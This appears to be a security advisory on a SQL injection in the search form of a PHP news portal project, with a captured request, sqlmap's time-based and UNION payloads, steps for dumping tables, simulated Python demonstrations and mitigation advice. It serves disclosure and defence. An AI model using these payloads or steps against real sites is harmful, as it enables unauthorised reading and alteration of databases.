Projectworlds Best Online News Portal Project V1.0 /search.php SQL Injection

by ADMIN

Introduction

In this article, we discuss a SQL injection vulnerability in the 'Best Online News Portal Project' V1.0, a PHP application, located in the '/search.php' script. The 'searchtitle' POST parameter is placed into a SQL query without parameterization, so an unauthenticated attacker can alter the query, read data from the backing MySQL database, and, depending on the privileges of the database account the application uses, modify or delete data.

Vulnerability Overview

The vulnerability stems from the 'searchtitle' parameter being embedded directly in the query text instead of being bound as a parameter. The injection point sits inside a single-quoted string literal, which is why the working payloads open with a single quote and end with a balancing 'fKDn'='fKDn tautology. An attacker can use this to read data the application's database account can see, to modify or delete data if that account has write privileges, and to degrade the service with expensive queries; wider system compromise is possible only if the database account or the DBMS configuration allows it.

Impact

The impact depends on the privileges of the database account the application connects with, but at minimum an attacker can:

  • Read any table that account can access, not only the news data the search is meant to expose
  • Modify or delete data, if the account has write privileges on the affected tables
  • Slow or stall the application by injecting expensive queries (the SLEEP() primitive used to confirm the bug is itself a denial-of-service lever)
  • Escalate toward host compromise only if the account holds dangerous privileges such as FILE or the DBMS is otherwise exposed; "comprehensive system control" should not be assumed without checking this

Vulnerability Details

The vulnerability is located in the '/search.php' file of the 'Best Online News Portal Project'. The 'searchtitle' POST parameter is concatenated into the SQL query as part of a quoted string literal, so a single quote in the input terminates the literal and the remainder of the input is executed as SQL.

Proof of Concept (POC)

The following is the baseline request captured for the vulnerability. The body 'searchtitle=111' is a benign value; the payloads in the following sections replace it (adjust Content-Length accordingly):

POST /101news/101news/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://localhost
Connection: close
Referer: http://localhost/101news/101news/news-details.php?nid=5
Cookie: PHPSESSID=r3bt76ge3sjka91e1v4nogtgkm
Upgrade-Insecure-Requests: 1
Priority: u=0, i

searchtitle=111

Vulnerability Type

sqlmap confirmed two injection techniques against 'searchtitle'. The time-based blind technique injects a conditional SLEEP() so that the truth of an attacker-chosen condition is inferred from whether the response is delayed; it needs no visible output from the query, only response timing, which is why it works even when the page does not reflect query results or errors. The UNION technique, also confirmed (eight columns), appends attacker-selected columns to the search results and is the faster route for extracting data when query output does reach the page.

Vulnerability Payload

The following is sqlmap's summary of the injection points it confirmed for the 'searchtitle' parameter:

---
Parameter: searchtitle (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=111' AND (SELECT 9902 FROM (SELECT(SLEEP(5)))MaAl) AND 'fKDn'='fKDn

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: searchtitle=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x576454474f687361594b564c76664e96848584e504373525072666c5746546a59714250777262,0x7171716b71)-- -
---

Exploitation

The vulnerability can be exploited using the following steps:

  1. Replay the captured POST request to '/search.php' with the body replaced by the SLEEP(5) payload above. A response that arrives roughly five seconds later than the benign 'searchtitle=111' request confirms the injection; repeat the probe a few times, since a single slow response can also be ordinary network latency.
  2. Feed the same saved request to sqlmap (-r with the request file, -p searchtitle to target the parameter) to enumerate databases and dump tables automatically. The UNION technique it identified is the faster extraction path; the time-based technique is the fallback when query output never reaches the page.
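The timing check from step 1, and the mechanism behind the time-based blind technique described in the Vulnerability Type section, as an added example that is not code from this advisory or from the project. The HTTP side is simulated by FakeSearchEndpoint so the script runs offline; the query shape (SELECT ... WHERE title LIKE '%<input>%'), the table and column names, and the latency figures are assumptions, not the project's real search.php. Replace FakeSearchEndpoint.post with a timed HTTP POST to test a live instance you are authorised to test.

```python
"""Confirming the time-based blind injection in 'searchtitle' from response timing.

Added example; the endpoint is simulated and the query shape is assumed.
"""
import random
import re
import statistics

SLEEP_RE = re.compile(r"SLEEP\((\d+(?:\.\d+)?)\)", re.IGNORECASE)


def sleep_payload(base: str, seconds: int) -> str:
    """The sqlmap time-based payload from the advisory, with the base value and delay pluggable."""
    return f"{base}' AND (SELECT 9902 FROM (SELECT(SLEEP({seconds})))MaAl) AND 'fKDn'='fKDn"


def code_outside_literals(sql: str) -> str:
    """Return the parts of a MySQL statement that are not inside single-quoted
    string literals, honouring backslash escapes and doubled quotes. Only code
    outside a literal is executed: that is what the injection exploits and
    what escaping or parameterization prevents."""
    out, in_str, i = [], False, 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\":                         # backslash escape: skip next char
                i += 2
                continue
            if c == "'":
                if sql[i + 1:i + 2] == "'":       # '' inside a literal is a quote
                    i += 2
                    continue
                in_str = False
        elif c == "'":
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


class FakeSearchEndpoint:
    """Stand-in for search.php + MySQL (assumed query shape, not the project's code).
    post() returns the response time in seconds instead of a page body. With
    escape=True it applies the backslash escaping mysqli_real_escape_string()
    would, for comparison with the vulnerable path."""
    QUERY = "SELECT id, title FROM news WHERE title LIKE '%{v}%'"  # assumed

    def __init__(self, escape: bool, seed: int = 7, base_latency: float = 0.12):
        self.escape = escape
        self.rng = random.Random(seed)            # deterministic jitter
        self.base_latency = base_latency

    def post(self, searchtitle: str) -> float:
        value = searchtitle
        if self.escape:
            value = value.replace("\\", "\\\\").replace("'", "\\'")
        sql = self.QUERY.format(v=value)
        elapsed = self.base_latency + self.rng.uniform(0.0, 0.25)   # network jitter
        # SLEEP() only runs if it ended up outside a string literal
        elapsed += sum(float(m.group(1)) for m in SLEEP_RE.finditer(code_outside_literals(sql)))
        return elapsed


def confirm_time_based(post, sleep_seconds: int = 5, samples: int = 3, fraction: float = 0.8) -> bool:
    """Decide from timing alone whether the endpoint is injectable.
    Every probe must be delayed by at least `fraction` of sleep_seconds over the
    median benign response; one slow response is not enough, because an
    ordinary latency spike can look like a single SLEEP()."""
    baseline = statistics.median([post("111") for _ in range(samples)])
    payload = sleep_payload("111", sleep_seconds)
    delays = [post(payload) - baseline for _ in range(samples)]
    return all(d >= fraction * sleep_seconds for d in delays)


if __name__ == "__main__":
    print("vulnerable:", confirm_time_based(FakeSearchEndpoint(escape=False).post))  # True
    print("escaped:   ", confirm_time_based(FakeSearchEndpoint(escape=True).post))   # False
```

The escaped variant is included only to show why the payload stops working once the quote can no longer close the literal; prepared statements remain the preferred fix, since escaping must be applied correctly at every concatenation site.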

Mitigation

To mitigate this vulnerability, the following steps can be taken:

  1. Use prepared statements (mysqli or PDO with bound parameters) so that 'searchtitle' is sent to MySQL as data and never spliced into the query text. This is the change that actually removes the bug.
  2. Validate input as defense in depth, for example by capping the length of the search term, but do not rely on validation alone: a search box legitimately receives quotes and SQL keywords, so blocklists are both bypassable and a source of broken searches.
  3. Connect with a database account that has only the privileges search.php needs (SELECT on the news tables), so that any residual injection cannot write data or reach FILE.
  4. A web application firewall (WAF) can add detection and, unlike a standard web server access log, can record the POST body the payload travels in, but it is not a substitute for parameterized queries.
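The concatenated query beside its parameterized form, as an added example that is not the project's code. It uses Python's sqlite3 module to stand in for PHP + MySQL because the bug and the fix have the same shape: the '?' placeholder below corresponds to a bound parameter in mysqli or PDO. The table layout, rows, and column names are constructed for the demonstration and are not taken from the project.

```python
"""String-built search query versus a parameterized one (added example, sqlite3 stand-in)."""
import sqlite3

NEWS = [  # constructed sample rows
    (1, "Council approves budget"),
    (2, "Interview with Mayor O'Brien"),
    (3, "Local team wins final"),
]
USERS = [(1, "admin", "not-a-real-hash")]  # constructed; stands in for any sensitive table


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", NEWS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def search_vulnerable(conn, term):
    """The bug class behind the advisory: user input spliced into query text.
    A quote in `term` ends the literal and everything after it becomes SQL."""
    sql = f"SELECT id, title FROM news WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The fix: the query text is fixed and `term` travels as a bound value.
    Quotes, UNION and comment markers are just characters to search for.
    (LIKE wildcards % and _ in the term still act as wildcards; that is a
    separate concern from injection and is handled with an ESCAPE clause.)"""
    sql = "SELECT id, title FROM news WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def vulnerable_breaks_on(conn, term):
    """True if the concatenated query is not even valid SQL for this input,
    which is what a legitimate search such as O'Brien does to the vulnerable code."""
    try:
        search_vulnerable(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


TAUTOLOGY = "xyz%' OR '%'='"                            # makes the WHERE clause always true
UNION = "x' UNION SELECT id, username FROM users -- "   # reads a different table

if __name__ == "__main__":
    conn = make_db()
    print(search_vulnerable(conn, TAUTOLOGY))   # every news row
    print(search_vulnerable(conn, UNION))       # [(1, 'admin')]
    print(search_safe(conn, TAUTOLOGY))         # []
    print(search_safe(conn, "O'Brien"))         # [(2, "Interview with Mayor O'Brien")]
```

The O'Brien case is the argument against fixing this with input filtering: rejecting or stripping quotes breaks ordinary searches, while the bound parameter handles them correctly and closes the injection at the same time.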

Conclusion

Q: What is the vulnerability in the 'Best online news portal project' in PHP?

A: The vulnerability is a SQL injection in the '/search.php' file of version V1.0. The 'searchtitle' POST parameter is concatenated into a SQL string literal, so an attacker can terminate the literal with a single quote and append their own SQL, gaining read access to the database and, depending on the database account's privileges, the ability to modify or delete data.

Q: What is the impact of this vulnerability?

A: The impact depends on the privileges of the application's database account, but at minimum an attacker can:

  • Read any table that account can access
  • Modify or delete data, if the account has write privileges
  • Slow or stall the service with expensive injected queries such as SLEEP()
  • Escalate toward host compromise only where the account holds dangerous privileges such as FILE or the DBMS is otherwise exposed

Q: How can the vulnerability be exploited?

A: By sending a POST request to '/search.php' with the 'searchtitle' parameter set to a SQL injection payload, such as the SLEEP(5) or UNION payloads listed above, and observing the response delay or the appended rows. sqlmap automates the rest of the process, from confirming the injection to dumping tables.

Q: What is the payload used to exploit the vulnerability?

A: sqlmap reported two working payloads for 'searchtitle': a time-based blind one that wraps SLEEP(5) in a conditional, so that the truth of an attacker-chosen condition shows up as a roughly five-second delay in the response, and a UNION query with eight NULL columns that appends attacker-chosen data to the search results.

Q: How can the vulnerability be mitigated?

A: The vulnerability can be mitigated by:

  • Using prepared statements with bound parameters so 'searchtitle' is never spliced into the query text (the fix that removes the bug)
  • Validating user input as defense in depth, without relying on it alone
  • Running the application under a least-privilege database account
  • Using a web application firewall (WAF) to detect and log injection attempts, including the POST body

Q: Is the vulnerability specific to the 'Best online news portal project' in PHP?

A: No. SQL injection occurs in any web application that splices user input into query text instead of binding it as a parameter; the 'Best Online News Portal Project' is simply one instance of that bug class.

Q: Can the vulnerability be exploited without login or authorization?

A: Yes. '/search.php' is the public search form, so no account is needed; the PHPSESSID cookie in the captured request is not required for the injection.

Q: What is the version of the 'Best online news portal project' that is affected by the vulnerability?

A: The vulnerability affects version V1.0 of the 'Best online news portal project'.

Q: Where can I download the 'Best online news portal project' in PHP?

A: The 'Best online news portal project' in PHP can be downloaded from the Sourcecodester website.

Q: What is the software link for the 'Best online news portal project' in PHP?

A: The software link for the 'Best online news portal project' in PHP is https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip.

Q: Who is the submitter of the vulnerability report?

A: The submitter of the vulnerability report is liuyuanyuan.

Q: What is the vulnerable file that contains the vulnerability?

A: The vulnerable file is '/search.php'.

Q: What is the root cause of the vulnerability?

A: The root cause is that the 'searchtitle' parameter is concatenated into the SQL query text instead of being passed as a bound parameter, so a single quote in the input escapes the string literal and the rest of the input is executed as SQL.